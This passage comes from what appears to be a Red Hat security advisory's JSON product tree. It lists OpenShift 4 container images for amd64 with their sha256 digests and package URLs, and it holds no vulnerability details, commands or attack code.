"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-machine-os-downloader-rhel9@sha256%3Ae33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-static-ip-manager-rhel9@sha256%3A02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557261"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3Ab71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604683"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-state-metrics-rhel9@sha256%3A6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564691"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564608"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3A03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-rhel9@sha256%3A97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-microshift-rhel9@sha256%3Aa165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572688"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-networkpolicy-rhel9@sha256%3A29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572927"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-networking-console-plugin-rhel9@sha256%3Aca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-server-rhel9@sha256%3A7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605151"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3A15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565249"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3A6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606800"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-rhel9@sha256%3A2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563791"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3Ab391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775630129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3A6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"product_id": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-deployer-rhel9@sha256%3A6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"product_id": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-haproxy-router-rhel9@sha256%3A596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577060"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3Ab207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557435"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3Abf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604322"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3A49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572233"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-registry-rhel9@sha256%3A802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605796"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"product_id": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tests-rhel9@sha256%3A30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775578545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-state-metrics-rhel9@sha256%3A8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cluster-api-controllers-rhel9@sha256%3Ad5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606714"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"product": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"product_id": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openstack-resource-controller-rhel9@sha256%3A784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606963"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3A920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604626"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3A233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-api-server-rhel9@sha256%3A2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606032"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-csr-approver-rhel9@sha256%3A12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572826"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-node-agent-rhel9@sha256%3Adbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-orchestrator-rhel9@sha256%3A69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-utils-rhel9@sha256%3A19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604573"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-apiserver-network-proxy-rhel9@sha256%3A7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564822"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-cloud-controller-manager-rhel9@sha256%3A8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557318"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-cluster-api-controllers-rhel9@sha256%3A3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557600"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"product": {
